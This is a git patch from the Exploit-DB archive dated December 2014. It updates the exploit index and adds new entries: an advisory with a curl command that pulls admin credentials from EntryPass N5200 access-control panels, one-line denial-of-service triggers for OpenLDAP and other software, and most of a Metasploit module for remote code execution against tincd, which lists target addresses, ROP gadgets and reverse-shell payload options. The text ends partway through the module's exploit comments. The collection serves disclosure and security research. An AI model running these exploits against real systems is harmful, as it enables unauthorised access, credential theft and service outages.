From a717bc9554c1afea3e320aabb000701770357455 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Thu, 4 Dec 2014 04:52:02 +0000
Subject: [PATCH] Updated 12_04_2014

---
 files.csv                            |  20 +
 platforms/hardware/webapps/35442.txt | 187 ++++++++++
 platforms/linux/dos/35445.txt        |   7 +
 platforms/linux/remote/35432.txt     |   7 +
 platforms/multiple/dos/35369.txt     |   9 +
 platforms/multiple/remote/35441.rb   | 527 +++++++++++++++++++++++++++
 platforms/osx/local/35440.rb         |  91 +++++
 platforms/php/webapps/35324.txt      |  78 ++++
 platforms/php/webapps/35378.txt      |  29 ++
 platforms/php/webapps/35396.txt      |  33 ++
 platforms/php/webapps/35414.txt      |   3 +-
 platforms/php/webapps/35439.txt      |  37 ++
 platforms/php/webapps/35443.txt      | 138 +++++++
 platforms/php/webapps/35444.txt      |  14 +
 platforms/php/webapps/35447.txt      |  53 +++
 platforms/php/webapps/35451.txt      |   7 +
 platforms/php/webapps/35452.txt      |   7 +
 platforms/php/webapps/35453.txt      |   9 +
 platforms/php/webapps/35454.txt      |   7 +
 platforms/windows/local/35326.cpp    | 318 ++++++++++++++++
 platforms/windows/remote/35434.txt   |   7 +
 platforms/windows/remote/35446.pl    |  62 ++++
 22 files changed, 1649 insertions(+), 1 deletion(-)
 create mode 100755 platforms/hardware/webapps/35442.txt
 create mode 100755 platforms/linux/dos/35445.txt
 create mode 100755 platforms/linux/remote/35432.txt
 create mode 100755 platforms/multiple/dos/35369.txt
 create mode 100755 platforms/multiple/remote/35441.rb
 create mode 100755 platforms/osx/local/35440.rb
 create mode 100755 platforms/php/webapps/35324.txt
 create mode 100755 platforms/php/webapps/35378.txt
 create mode 100755 platforms/php/webapps/35396.txt
 create mode 100755 platforms/php/webapps/35439.txt
 create mode 100755 platforms/php/webapps/35443.txt
 create mode 100755 platforms/php/webapps/35444.txt
 create mode 100755 platforms/php/webapps/35447.txt
 create mode 100755 platforms/php/webapps/35451.txt
 create mode 100755 platforms/php/webapps/35452.txt
 create mode 100755 platforms/php/webapps/35453.txt
 create mode 100755 platforms/php/webapps/35454.txt
 create mode 100755 platforms/windows/local/35326.cpp
 create mode 100755 platforms/windows/remote/35434.txt
 create mode 100755 platforms/windows/remote/35446.pl

diff --git a/files.csv b/files.csv
index 0d39b466b..1cb188408 100755
--- a/files.csv
+++ b/files.csv
@@ -31816,7 +31816,9 @@ id,file,description,date,author,platform,type,port
 35320,platforms/php/webapps/35320.txt,"ViArt Shop 4.0.5 Multiple Cross Site Scripting Vulnerabilities",2011-02-08,"High-Tech Bridge SA",php,webapps,0
 35322,platforms/windows/local/35322.txt,"Privacyware Privatefirewall 7.0 - Unquoted Service Path Privilege Escalation",2014-11-22,LiquidWorm,windows,local,0
 35323,platforms/php/webapps/35323.md,"MyBB <= 1.8.2 - unset_globals() Function Bypass and Remote Code Execution Vulnerability",2014-11-22,"Taoguang Chen",php,webapps,0
+35324,platforms/php/webapps/35324.txt,"Wordpress CM Download Manager Plugin 2.0.0 - Code Injection",2014-11-22,"Phi Ngoc Le",php,webapps,0
 35325,platforms/hardware/webapps/35325.txt,"Netgear Wireless Router WNR500 - Parameter Traversal Arbitrary File Access Exploit",2014-11-22,LiquidWorm,hardware,webapps,0
+35326,platforms/windows/local/35326.cpp,"Microsoft Windows Win32k.sys - Denial of Service",2014-11-22,Kedamsky,windows,local,0
 35327,platforms/php/webapps/35327.txt,"CiviCRM 3.3.3 Multiple Cross Site Scripting Vulnerabilities",2011-02-08,"AutoSec Tools",php,webapps,0
 35328,platforms/php/webapps/35328.txt,"UMI CMS 2.8.1.2 Multiple Cross Site Scripting Vulnerabilities",2011-02-08,"High-Tech Bridge SA",php,webapps,0
 35329,platforms/php/webapps/35329.txt,"PHPXref 0.7 'nav.html' Cross Site Scripting Vulnerability",2011-02-09,MustLive,php,webapps,0
@@ -31856,6 +31858,7 @@ id,file,description,date,author,platform,type,port
 35365,platforms/php/webapps/35365.py,"phpMyRecipes 1.2.2 (dosearch.php, words_exact param) - SQL Injection",2014-11-25,bard,php,webapps,80
 35366,platforms/multiple/remote/35366.txt,"IBM Lotus Sametime stconf.nsf XSS",2011-02-21,"Dave Daly",multiple,remote,0
 35367,platforms/php/webapps/35367.txt,"crea8social 1.3 - Stored XSS Vulnerability",2014-11-25,"Halil Dalabasmaz",php,webapps,80
+35369,platforms/multiple/dos/35369.txt,"Battlefield 2/2142 Malformed Packet NULL Pointer Dereference Remote Denial Of Service Vulnerability",2011-02-22,"Luigi Auriemma",multiple,dos,0
 35370,platforms/linux/local/35370.c,"Linux Kernel libfutex Local Root for RHEL/CentOS 7.0.1406",2014-11-25,"Kaiqu Chen",linux,local,0
 35371,platforms/php/webapps/35371.txt,"Wordpress Google Document Embedder 2.5.14 - SQL Injection",2014-11-25,"Kacper Szurek",php,webapps,80
 35372,platforms/hardware/webapps/35372.rb,"Arris VAP2500 Authentication Bypass",2014-11-25,HeadlessZeke,hardware,webapps,80
@@ -31864,6 +31867,7 @@ id,file,description,date,author,platform,type,port
 35375,platforms/php/webapps/35375.txt,"Vanilla Forums 2.0.17.x 'p' Parameter Cross Site Scripting Vulnerability",2011-02-22,"Aung Khant",php,webapps,0
 35376,platforms/php/webapps/35376.txt,"mySeatXT 0.164 'lang' Parameter Local File Include Vulnerability",2011-02-16,"AutoSec Tools",php,webapps,0
 35377,platforms/windows/local/35377.rb,"Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 (.wax) SEH Buffer Overflow",2014-11-26,"Muhamad Fadzil Ramli",windows,local,0
+35378,platforms/php/webapps/35378.txt,"Wordpress DB Backup Plugin - Arbitrary File Download",2014-11-26,"Ashiyane Digital Security Team",php,webapps,80
 35379,platforms/windows/dos/35379.go,"Elipse E3 HTTP Denial of Service",2014-11-26,firebitsbr,windows,dos,80
 35380,platforms/php/remote/35380.rb,"Pandora FMS SQLi Remote Code Execution",2014-11-26,metasploit,php,remote,80
 35381,platforms/php/webapps/35381.txt,"xEpan 1.0.1 - CSRF Vulnerability",2014-11-26,"High-Tech Bridge SA",php,webapps,80
@@ -31878,6 +31882,7 @@ id,file,description,date,author,platform,type,port
 35393,platforms/php/webapps/35393.txt,"WordPress ComicPress Manager Plugin 1.4.9 'lang' Parameter Cross Site Scripting Vulnerability",2011-02-23,"AutoSec Tools",php,webapps,0
 35394,platforms/php/webapps/35394.txt,"WordPress YT-Audio Plugin 1.7 'v' Parameter Cross Site Scripting Vulnerability",2011-02-23,"AutoSec Tools",php,webapps,0
 35395,platforms/windows/local/35395.txt,"CCH Wolters Kluwer PFX Engagement <= 7.1 - Local Privilege Escalation",2014-11-28,"Information Paradox",windows,local,0
+35396,platforms/php/webapps/35396.txt,"xEpan 1.0.4 - Multiple Vulnerability",2014-11-28,"Parikesit , Kurawa",php,webapps,0
 35397,platforms/php/webapps/35397.txt,"Drupal Cumulus Module 5.X-1.1/6.X-1.4 'tagcloud' Parameter Cross Site Scripting Vulnerability",2011-02-23,MustLive,php,webapps,0
 35398,platforms/multiple/remote/35398.pl,"KMPlayer 2.9.3.1214 '.ksf' File Remote Buffer Overflow Vulnerability",2011-02-28,KedAns-Dz,multiple,remote,0
 35399,platforms/windows/remote/35399.pl,"DivX Player 6.x '.dps' File Remote Buffer Overflow Vulnerability",2011-02-28,KedAns-Dz,windows,remote,0
@@ -31907,8 +31912,23 @@ id,file,description,date,author,platform,type,port
 35429,platforms/php/webapps/35429.txt,"PhotoSmash Galleries WordPress Plugin 1.0.x 'action' Parameter Cross Site Scripting Vulnerability",2011-03-08,"High-Tech Bridge SA",php,webapps,0
 35430,platforms/php/webapps/35430.txt,"1 Flash Gallery WordPress Plugin 0.2.5 Cross Site Scripting and SQL Injection Vulnerabilities",2011-03-08,"High-Tech Bridge SA",php,webapps,0
 35431,platforms/php/webapps/35431.txt,"RuubikCMS 1.0.3 'head.php' Cross Site Scripting Vulnerability",2011-03-08,IRCRASH,php,webapps,0
+35432,platforms/linux/remote/35432.txt,"Wireshark 1.4.3 - NTLMSSP NULL Pointer Dereference Denial Of Service Vulnerability",2011-03-01,"Buildbot Builder",linux,remote,0
 35433,platforms/osx/remote/35433.pl,"Apple QuickTime 7.5 '.m3u' File Remote Stack Buffer Overflow Vulnerability",2011-03-09,KedAns-Dz,osx,remote,0
+35434,platforms/windows/remote/35434.txt,"WebKit 1.2.x - Local Webpage Cross Domain Information Disclosure Vulnerability",2011-03-09,"Aaron Sigel",windows,remote,0
 35435,platforms/php/webapps/35435.txt,"Lazyest Gallery WordPress Plugin 1.0.26 'image' Parameter Cross Site Scripting Vulnerability",2011-03-10,"High-Tech Bridge SA",php,webapps,0
 35436,platforms/php/webapps/35436.txt,"Xinha 0.96 'spell-check-savedicts.php' Multiple HTML Injection Vulnerabilities",2011-03-10,"John Leitch",php,webapps,0
 35437,platforms/multiple/dos/35437.pl,"Air Contacts Lite HTTP Packet Denial Of Service Vulnerability",2011-02-09,"Rodrigo Escobar",multiple,dos,0
 35438,platforms/cgi/webapps/35438.txt,"CosmoShop V10.05.00 Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2011-03-10,"High-Tech Bridge SA",cgi,webapps,0
+35439,platforms/php/webapps/35439.txt,"Wordpress Nextend Facebook Connect Plugin 1.4.59 - XSS Vulnerability",2014-12-02,"Kacper Szurek",php,webapps,80
+35440,platforms/osx/local/35440.rb,"Mac OS X IOKit Keyboard Driver Root Privilege Escalation",2014-12-02,metasploit,osx,local,0
+35441,platforms/multiple/remote/35441.rb,"Tincd Post-Authentication Remote TCP Stack Buffer Overflow",2014-12-02,metasploit,multiple,remote,655
+35442,platforms/hardware/webapps/35442.txt,"EntryPass N5200 - Credentials Exposure",2014-12-02,"RedTeam Pentesting",hardware,webapps,0
+35443,platforms/php/webapps/35443.txt,"TYPO3 ke DomPDF Extension - Remote Code Execution",2014-12-02,"RedTeam Pentesting",php,webapps,80
+35444,platforms/php/webapps/35444.txt,"LMS Web Ensino Multiple Input Validation Vulnerabilities",2011-03-04,waKKu,php,webapps,0
+35445,platforms/linux/dos/35445.txt,"OpenLDAP 2.4.x 'modrdn' NULL OldDN Remote Denial of Service Vulnerability",2011-01-03,"Serge Dubrouski",linux,dos,0
+35446,platforms/windows/remote/35446.pl,"Windows Movie Maker 2.1.4026 '.avi' File Remote Buffer Overflow Vulnerability",2011-03-10,KedAns-Dz,windows,remote,0
+35447,platforms/php/webapps/35447.txt,"Google Document Embedder 2.5.16 - mysql_real_escpae_string bypass SQL Injection",2014-12-03,"Securely (Yoo Hee man)",php,webapps,0
+35451,platforms/php/webapps/35451.txt,"BoutikOne categorie.php path Parameter SQL Injection",2011-03-14,cdx.security,php,webapps,0
+35452,platforms/php/webapps/35452.txt,"BoutikOne list.php path Parameter SQL Injection",2011-03-14,cdx.security,php,webapps,0
+35453,platforms/php/webapps/35453.txt,"BoutikOne search.php Multiple Parameter SQL Injection",2011-03-14,cdx.security,php,webapps,0
+35454,platforms/php/webapps/35454.txt,"BoutikOne rss_news.php lang Parameter SQL Injection",2011-03-14,cdx.security,php,webapps,0
diff --git a/platforms/hardware/webapps/35442.txt b/platforms/hardware/webapps/35442.txt
new file mode 100755
index 000000000..fbb6dff2c
--- /dev/null
+++ b/platforms/hardware/webapps/35442.txt
@@ -0,0 +1,187 @@
+Advisory: EntryPass N5200 Credentials Disclosure
+
+EntryPass N5200 Active Network Control Panels allow the unauthenticated
+downloading of information that includes the current administrative
+username and password.
+
+
+Details
+=======
+
+Product: EntryPass N5200 Active Network Control Panel
+Affected Versions: unknown
+Fixed Versions: not available
+Vulnerability Type: Information Disclosure, Credentials Disclosure
+Security Risk: high
+Vendor URL: http://www.entrypass.net/w3v1/products/active-network/n5200
+Vendor Status: notified
+Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-011
+Advisory Status: published
+CVE: CVE-2014-8868
+CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8868
+
+
+Introduction
+============
+
+"EntryPass Active Networks are designed to enhance highly customized and
+rapid 'real-time' changes to the underlying network operation.
+Brilliantly engineered with all the power you need to enable
+code-sending, minus unnecessary buffer time with its distributed
+architecture capable of processing access demand at the edge level
+without leveraging at the server end."
+
+(From the vendor's home page)
+
+
+More Details
+============
+
+EntryPass N5200 Active Network Control Panels offer an HTTP service on
+TCP port 80. It appears that only the first character of a requested
+URL's path is relevant to the web server. For example, requesting the
+URL
+
+http://example.com/1styles.css
+
+yields the same CSS file as requesting the following URL:
+
+http://example.com/1redteam
+
+By enumerating all one-character long URLs on a device, it was
+determined that URLs starting with a numeric character are used by the
+web interface, as listed in the following table:
+
+   http://example.com/0       Index
+   http://example.com/1       Stylesheet
+   http://example.com/2       Authentication with Username/Password
+   http://example.com/3       Session Management
+   http://example.com/4       Device Status
+   http://example.com/5       Progressbar Image
+   http://example.com/6       Reset Status
+   http://example.com/7       Login Form
+   http://example.com/8       HTTP 404 Error Page
+   http://example.com/9       JavaScript
+
+For URLs starting with non-numeric characters, an HTTP 404 - Not Found
+error page is normally returned. Exceptions to this rule are URLs
+starting with the lower case letters o to z and the upper case letters A
+to D. When requesting these URLs, memory contents from the device appear
+to be returned in the server's HTTP response.
+
+As highlighted in the following listing, both the currently set username
+ADMIN and the corresponding password 123456 are disclosed in the memory
+contents when requesting the URL http://example.com/o:
+
+$ curl -s http://example.com/o | hexdump -C | head
+[...]
+0010 XX XX XX XX XX XX XX XX  XX XX XX 77 77 77 2e 65 |XXXXXXXXXXXwww.e|
+0020 6e 74 72 79 70 61 73 73  2e 6e 65 74 00 00 00 00 |ntrypass.net....|
+[...]
+0060 XX XX XX XX XX XX XX XX  XX XX 41 44 4d 49 4e 26 |XXXXXXXXXXADMIN&|
+0070 20 20 31 32 33 34 35 36  26 20 XX XX XX XX XX XX |  123456& XXXXXX|
+[...]
+
+These credentials grant access to the administrative web interface of
+the device when using them in the regular login form.
+
+Similarly, it is possible to get the status output of the device without
+prior authentication by simply requesting the following URL
+
+http://example.com/4
+
+The server responds to the request with the following XML data, which
+contains information about various different settings of the device.
+
+<html>
+<head>
+<title>Device Server Manager</title>
+</head>
+<body>
+<serial_no>XXXXXXXXXXXX-XXXX</serial_no>
+<firmware_version>HCB.CC.S1.04.04.11.02 -N5200[64Mb]</firmware_version>
+<mac_address>XX-XX-XX-XX-XX-XX</mac_address>
+<disable_reporting>disabled</disable_reporting>
+<commit_setting>checked</commit_setting>
+<user_id>ADMIN</user_id>
+<user_pass>******</user_pass>
+[...]
+</body>
+</html>
+
+
+Proof of Concept
+================
+
+------------------------------------------------------------------------
+$ curl -s http://example.com/o | hexdump -C | head
+------------------------------------------------------------------------
+
+
+Workaround
+==========
+
+Access to the web interface should be blocked at the network layer.
+
+
+Fix
+===
+
+Not available.
+
+
+Security Risk
+=============
+
+Attackers with network access to an EntryPass N5200 Active Network
+Control Panel can retrieve memory contents from the device. These memory
+contents disclose the currently set username and password needed to
+access the administrative interface of the device. Using these
+credentials, it is possible to read the device's current status and
+configuration, as well as modify settings and install firmware updates.
+
+With regards to the device itself, this vulnerability poses a high risk,
+as it allows attackers to gain full control. The actual operational risk
+depends on how the device is used in practice.
+
+
+Timeline
+========
+
+2014-05-19 Vulnerability identified
+2014-08-25 Customer approved disclosure to vendor
+2014-08-27 Vendor contacted, security contact requested
+2014-09-03 Vendor contacted, security contact requested
+2014-09-15 Vendor contacted, vulnerability reported
+2014-09-17 Update requested from vendor, no response
+2014-10-15 No response from vendor. Customer discontinued use of the
+           product and approved public disclosure
+2014-10-20 Contacted vendor again since no fix or roadmap was provided.
+2014-10-28 CVE number requested
+2014-11-14 CVE number assigned
+2014-12-01 Advisory released
+
+
+RedTeam Pentesting GmbH
+=======================
+
+RedTeam Pentesting offers individual penetration tests, short pentests,
+performed by a team of specialised IT-security experts. Hereby, security
+weaknesses in company networks or products are uncovered and can be
+fixed immediately.
+
+As there are only few experts in this field, RedTeam Pentesting wants to
+share its knowledge and enhance the public knowledge with research in
+security-related areas. The results are made available as public
+security advisories.
+
+More information about RedTeam Pentesting can be found at
+https://www.redteam-pentesting.de.
+
+
+-- 
+RedTeam Pentesting GmbH                   Tel.: +49 241 510081-0
+Dennewartstr. 25-27                       Fax : +49 241 510081-99
+52068 Aachen                    https://www.redteam-pentesting.de
+Germany                         Registergericht: Aachen HRB 14004
+Geschäftsführer:                       Patrick Hof, Jens Liebchen
\ No newline at end of file
diff --git a/platforms/linux/dos/35445.txt b/platforms/linux/dos/35445.txt
new file mode 100755
index 000000000..8fe900380
--- /dev/null
+++ b/platforms/linux/dos/35445.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/46831/info
+
+OpenLDAP is prone to a remote denial-of-service vulnerability that affects the 'modify relative distinguished name' (modrdn) command.
+
+Attackers can exploit this issue to deny service to legitimate users by crashing affected 'slapd' servers. 
+
+ldapmodrdn -x -H ldap://ldapserver -r '' o=test 
\ No newline at end of file
diff --git a/platforms/linux/remote/35432.txt b/platforms/linux/remote/35432.txt
new file mode 100755
index 000000000..c1d266e7d
--- /dev/null
+++ b/platforms/linux/remote/35432.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/46796/info
+
+Wireshark is prone to a remote denial-of-service vulnerability caused by a NULL-pointer dereference error.
+
+An attacker can exploit this issue to crash the application, resulting in a denial-of-service condition. 
+
+http://www.exploit-db.com/sploits/35432.pcap
\ No newline at end of file
diff --git a/platforms/multiple/dos/35369.txt b/platforms/multiple/dos/35369.txt
new file mode 100755
index 000000000..79c04e87f
--- /dev/null
+++ b/platforms/multiple/dos/35369.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/46478/info
+
+Battlefield 2 and 2142 are prone to a remote denial-of-service vulnerability due to a NULL-pointer dereference condition.
+
+An attacker may exploit this issue to crash the application, resulting in a denial-of-service condition.
+
+Battlefield 2 version 1.50 and Battlefield 2142 version 1.51 are vulnerable. Other versions may also be affected.
+
+http://www.exploit-db.com/sploits/35369.zip
\ No newline at end of file
diff --git a/platforms/multiple/remote/35441.rb b/platforms/multiple/remote/35441.rb
new file mode 100755
index 000000000..e153de03a
--- /dev/null
+++ b/platforms/multiple/remote/35441.rb
@@ -0,0 +1,527 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'securerandom'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = AverageRanking
+
+  include Msf::Exploit::EXE
+  include Msf::Exploit::Remote::TincdExploitClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Tincd Post-Authentication Remote TCP Stack Buffer Overflow',
+      'Description'    => %q{
+        This module exploits a stack buffer overflow in Tinc's tincd
+        service. After authentication, a specially crafted tcp packet (default port 655)
+        leads to a buffer overflow and allows to execute arbitrary code. This module has
+        been tested with tinc-1.1pre6 on Windows XP (custom calc payload) and Windows 7
+        (windows/meterpreter/reverse_tcp), and tinc version 1.0.19 from the ports of
+        FreeBSD 9.1-RELEASE # 0 and various other OS, see targets. The exploit probably works
+        for all versions <= 1.1pre6.
+        A manually compiled version (1.1.pre6) on Ubuntu 12.10 with gcc 4.7.2 seems to
+        be a non-exploitable crash due to calls to __memcpy_chk depending on how tincd
+        was compiled. Bug got fixed in version 1.0.21/1.1pre7. While writing this module
+        it was recommended to the maintainer to start using DEP/ASLR and other protection
+        mechanisms.
+      },
+      'Author'         =>
+        [
+            # PoC changes (mostly reliability), port python to ruby, exploitation including ROP, support for all OS, metasploit module
+            'Tobias Ospelt <tobias[at]modzero.ch>', # @floyd_ch
+            # original finding, python PoC crash
+            'Martin Schobert <schobert[at]modzero.ch>' # @nitram2342
+        ],
+      'References'     =>
+        [
+          ['CVE', '2013-1428'],
+          ['OSVDB', '92653'],
+          ['BID', '59369'],
+          ['URL', 'http://www.floyd.ch/?p=741'],
+          ['URL', 'http://sitsec.net/blog/2013/04/22/stack-based-buffer-overflow-in-the-vpn-software-tinc-for-authenticated-peers/'],
+          ['URL', 'http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2013-1428']
+        ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'process'
+        },
+      'Payload'        =>
+        {
+          'Space'    => 1675,
+          'DisableNops' => true
+        },
+      'Privileged'     => true,
+      'Targets'        =>
+          [
+            # full exploitation x86:
+            ['Windows XP x86, tinc 1.1.pre6 (exe installer)',  { 'Platform' => 'win', 'Ret' => 0x0041CAA6, 'offset' => 1676 }],
+            ['Windows 7 x86, tinc 1.1.pre6 (exe installer)',  { 'Platform' => 'win', 'Ret' => 0x0041CAA6, 'offset' => 1676 }],
+            ['FreeBSD 9.1-RELEASE # 0 x86, tinc 1.0.19 (ports)', { 'Platform' => 'bsd', 'Ret' => 0x0804BABB, 'offset' => 1676 }],
+            ['Fedora 19 x86 ROP (NX), write binary to disk payloads, tinc 1.0.20 (manual compile)', {
+              'Platform' => 'linux', 'Arch' => ARCH_X86, 'Ret' => 0x4d10ee87, 'offset' => 1676 }
+              ],
+            ['Fedora 19 x86 ROP (NX), CMD exec payload, tinc 1.0.20 (manual compile)', {
+              'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Ret' => 0x4d10ee87, 'offset' => 1676 }
+              ],
+            ['Archlinux 2013.04.01 x86, tinc 1.0.20 (manual compile)',  { 'Platform' => 'linux', 'Ret' => 0x08065929, 'offset' => 1676 }],
+            ['OpenSuse 11.2 x86, tinc 1.0.20 (manual compile)',  { 'Platform' => 'linux', 'Ret' => 0x0804b07f, 'offset' => 1676 }],
+            # full exploitation ARM:
+            ['Pidora 18 ARM ROP(NX)/ASLR brute force, write binary to disk payloads, tinc 1.0.20 (manual compile with restarting daemon)',  {
+              'Platform' => 'linux', 'Arch' => ARCH_ARMLE, 'Ret' => 0x00015cb4, 'offset' => 1668 }
+            ],
+            ['Pidora 18 ARM ROP(NX)/ASLR brute force, CMD exec payload, tinc 1.0.20 (manual compile with restarting daemon)',  {
+              'Platform' => 'linux', 'Arch' => ARCH_CMD, 'Ret' => 0x00015cb4, 'offset' => 1668 }
+            ],
+            # crash only:
+            ['Crash only: Ubuntu 12.10 x86, tinc 1.1.pre6 (apt-get or manual compile)',  { 'Platform' => 'linux', 'Ret' => 0x0041CAA6, 'offset' => 1676 }],
+            ['Crash only: Fedora 16 x86, tinc 1.0.19 (yum)',  { 'Platform' => 'linux', 'Ret' => 0x0041CAA6, 'offset' => 1676 }],
+            ['Crash only: OpenSuse 11.2 x86, tinc 1.0.16 (rpm package)',  { 'Platform' => 'linux', 'Ret' => 0x0041CAA6, 'offset' => 1676 }],
+            ['Crash only: Debian 7.3 ARM, tinc 1.0.19 (apt-get)',  { 'Platform' => 'linux', 'Ret' => 0x9000, 'offset' => 1668 }]
+          ],
+      'DisclosureDate' => 'Apr 22 2013', # finding, msf module: Dec 2013
+      'DefaultTarget'  => 0))
+
+    register_options(
+        [ # Only for shellcodes that write binary to disk
+          # Has to be short, usually either . or /tmp works
+          # /tmp could be mounted as noexec
+          # . is usually only working if tincd is running as root
+          OptString.new('BINARY_DROP_LOCATION', [false, 'Short location to drop executable on server, usually /tmp or .', '/tmp']),
+          OptInt.new('BRUTEFORCE_TRIES', [false, 'How many brute force tries (ASLR brute force)', 200]),
+          OptInt.new('WAIT', [false, 'Waiting time for server daemon restart (ASLR brute force)', 3])
+        ], self
+      )
+  end
+
+  def exploit
+    # #
+    # x86
+    # #
+    # WINDOWS XP and 7 full exploitation
+    # Simple, we only need some mona.py magic
+    # C:\Program Files\tinc>"C:\Program Files\Immunity Inc\Immunity Debugger\ImmunityDebugger.exe" "C:\Program Files\tinc\tincd.exe -D -d 5"
+    # !mona config -set workingfolder c:\logs\%p
+    # !mona pc 1682
+    #  --> C:\logs\tincd\pattern
+    # !mona findmsp
+    # Straight forward, when we overwrite EIP the second value
+    # on the stack is pointing to our payload.
+    # !mona findwild -o -type instr -s "pop r32# ret"
+
+    # FREEBSD full exploitation
+    # Same offset as windows, same exploitation method
+    # But we needed a new pop r32# ret for the freebsd version
+    # No mona.py help on bsd or linux so:
+    # - Dumped .text part of tincd binary in gdb
+    # - Search in hex editor for opcodes for "pop r32# ret":
+    #  58c3, 59c3, ..., 5fc3
+    # - Found a couple of 5dc3. ret = start of .text + offset in hex editor
+    # - 0x0804BABB works very well
+
+    # UBUNTU crash only
+    # Manually compiled version (1.1.pre6) on Ubuntu 12.10 with gcc 4.7.2 seems to be a non-exploitable crash, because
+    # the bug is in a fixed size (MAXSIZE) struct member variable. The size of the destination is known
+    # at compile time. gcc is introducing a call to __memcpy_chk:
+    # http://gcc.gnu.org/svn/gcc/branches/cilkplus/libssp/memcpy-chk.c
+    # memcpy_chk does a __chk_fail call if the destination buffer is smaller than the source buffer. Therefore it will print
+    # *** buffer overflow detected *** and terminate (SIGABRT). The same result for tincd 10.0.19 which can be installed
+    # from the repository. It might be exploitable for versions compiled with an older version of gcc.
+    # memcpy_chk seems to be in gcc since 2005:
+    # http://gcc.gnu.org/svn/gcc/branches/cilkplus/libssp/memcpy-chk.c
+    # http://gcc.gnu.org/git/?p=gcc.git;a=history;f=libssp/memcpy-chk.c;hb=92920cc62318e5e8b6d02d506eaf66c160796088
+
+    # OPENSUSE
+    # OpenSuse 11.2
+    # Installation as described on the tincd website. For 11.2 there are two versions.
+    # Decided for 1.0.16 as this is a vulnerable version
+    # wget "http://download.opensuse.org/repositories/home:/seilerphilipp/SLE_11_SP2/i586/tinc-1.0.16-3.1.i586.rpm"
+    # rpm -i tinc-1.0.16-3.1.i586.rpm
+    # Again, strace shows us that the buffer overflow was detected (see Ubuntu)
+    # writev(2, [{"*** ", 4}, {"buffer overflow detected", 24}, {" ***: ", 6}, {"tincd", 5}, {" terminated\n", 12}], 5) = 51
+    # So a crash-only non-exploitable bof here. So let's go for manual install:
+    # wget 'http://www.tinc-vpn.org/packages/tinc-1.0.20.tar.gz'
+    # yast -i gcc zlib zlib-devel && echo "yast is still ugly" && zypper install lzo-devel libopenssl-devel make && make && make install
+    # Exploitable. Let's see:
+    # tincd is mapped at 0x8048000. There is a 5d3c at offset 307f in the tincd binary. this means:
+    # the offset to pop ebp; ret is 0x0804b07f
+
+    # FEDORA
+    # Fedora 16
+    # yum has version 1.0.19
+    # yum install tinc
+    # Non-exploitable crash, see Ubuntu. Strace tells us:
+    # writev(2, [{"*** ", 4}, {"buffer overflow detected", 24}, {" ***: ", 6}, {"tincd", 5}, {" terminated\n", 12}], 5) = 51
+    # About yum: Fedora 17 has fixed version 1.0.21, Fedora 19 fixed version 1.0.23
+    # Manual compile went on with Fedora 19
+    # wget 'http://www.tinc-vpn.org/packages/tinc-1.0.20.tar.gz'
+    # yum install gcc zlib-devel.i686 lzo-devel.i686 openssl-devel.i686 && ./configure && make && make install
+    # Don't forget to stop firewalld for testing, as the port is still closed otherwise
+    # # hardening-check tincd
+    # tincd:
+    #  Position Independent Executable: no, normal executable!
+    #  Stack protected: no, not found!
+    #  Fortify Source functions: no, only unprotected functions found!
+    #  Read-only relocations: yes
+    #  Immediate binding: no, not found!
+    # Running this module with target set to Windows:
+    # Program received signal SIGSEGV, Segmentation fault.
+    # 0x0041caa6 in ?? ()
+    # well and that's our windows offset...
+    # (gdb) info proc mappings
+    # 0x8048000  0x8068000    0x20000        0x0 /usr/local/sbin/tincd
+    # After finding a normal 5DC3 (pop ebp# ret) at offset 69c3 of the binary we
+    # can try to execute the payload on the stack, but:
+    # (gdb) stepi
+    # Program received signal SIGSEGV, Segmentation fault.
+    # 0x08e8ee08 in ?? ()
+    # Digging deeper we find:
+    # dmesg | grep protection
+    # [    0.000000] NX (Execute Disable) protection: active
+    # or:
+    # # objdump -x /usr/local/sbin/tincd
+    # [...] STACK off    0x00000000 vaddr 0x00000000 paddr 0x00000000 align 2**4
+    #       filesz 0x00000000 memsz 0x00000000 flags rw-
+    # or: https://bugzilla.redhat.com/show_bug.cgi?id=996365
+    # Time for ROP
+    # To start the ROP we need a POP r32# POP ESP# RET (using the first four bytes of the shellcode
+    # as a pointer to instructions). Was lucky after some searching:
+    # (gdb) x/10i 0x4d10ee87
+    #    0x4d10ee87:  pop    %ebx
+    #    0x4d10ee88:  mov    $0xf5d299dd,%eax
+    #    0x4d10ee8d:  rcr    %cl,%al
+    #    0x4d10ee8f:  pop    %esp
+    #    0x4d10ee90:  ret
+
+    # ARCHLINUX
+    # archlinux-2013.04.01 pacman has fixed version 1.0.23, so went for manual compile:
+    # wget 'http://www.tinc-vpn.org/packages/tinc-1.0.20.tar.gz'
+    # pacman -S gcc zlib lzo openssl make && ./configure && make && make install
+    # Offset in binary to 58c3: 0x1D929 + tincd is mapped at starting address 0x8048000
+    # -->Ret: 0x8065929
+    # No NX protection, it simply runs the shellcode :)
+
+    # #
+    # ARM
+    # #
+    # ARM Pidora 18 (Raspberry Pi Fedora Remix) on a physical Raspberry Pi
+    # Although this is more for the interested reader, as Pidora development
+    # already stopped... Raspberry Pi's are ARM1176JZF-S (700 MHz) CPUs
+    # meaning it's an ARMv6 architecture
+    # yum has fixed version 1.0.21, so went for manual compile:
+    # wget 'http://www.tinc-vpn.org/packages/tinc-1.0.20.tar.gz'
+    # yum install gdb gcc zlib-devel lzo-devel openssl-devel && ./configure && make && make install
+    # Is the binary protected?
+    # wget "http://www.trapkit.de/tools/checksec.sh" && chmod +x checksec.sh
+    # # ./checksec.sh --file /usr/local/sbin/tincd
+    # RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
+    # No RELRO        No canary found   NX enabled    No PIE          No RPATH   No RUNPATH   /usr/local/sbin/tincd
+    # so again NX... but what about the system things?
